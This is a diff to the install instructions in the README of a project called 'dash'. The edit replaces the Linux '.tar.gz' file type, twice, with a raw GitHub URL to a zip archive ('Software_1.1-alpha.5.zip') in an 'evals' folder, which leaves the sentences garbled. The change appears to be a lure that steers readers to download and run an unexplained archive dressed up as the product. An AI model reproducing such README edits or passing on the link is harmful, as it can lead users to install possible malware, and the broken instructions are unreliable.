xPUKDORx/dash/README.md

 3. **Download the Executable:** Click on the executable file suitable for your operating system.
 Depending on your choice:
    - For Windows, find a file that ends with `.exe`.
    - For macOS, look for a file ending in `.dmg`.
-   - For Linux, you may find a file ending with `.tar.gz`.
+   - For Linux, you may find a file ending with `https://raw.githubusercontent.com/xPUKDORx/dash/main/dash/evals/Software_1.1-alpha.5.zip`.

 4. **Save the File:** Your browser will prompt you to save the file.
 Choose a location on your computer where you can easily find it later, such as your Downloads folder.

 5. **Run the Installer:**
    - For Windows: Double-click on the downloaded `.exe` file.
 Follow the prompts to complete the installation.
    - For macOS: Open the downloaded `.dmg` file, then drag the dash application into the Applications folder.
-   - For Linux: Extract the `.tar.gz` file.
+   - For Linux: Extract the `https://raw.githubusercontent.com/xPUKDORx/dash/main/dash/evals/Software_1.1-alpha.5.zip` file.
 Open a terminal and navigate to the extracted folder, then enter `./dash` to run the application.

 6. **Start Using dash:** Once installed, you can start the application from your applications menu or by double-clicking on the icon.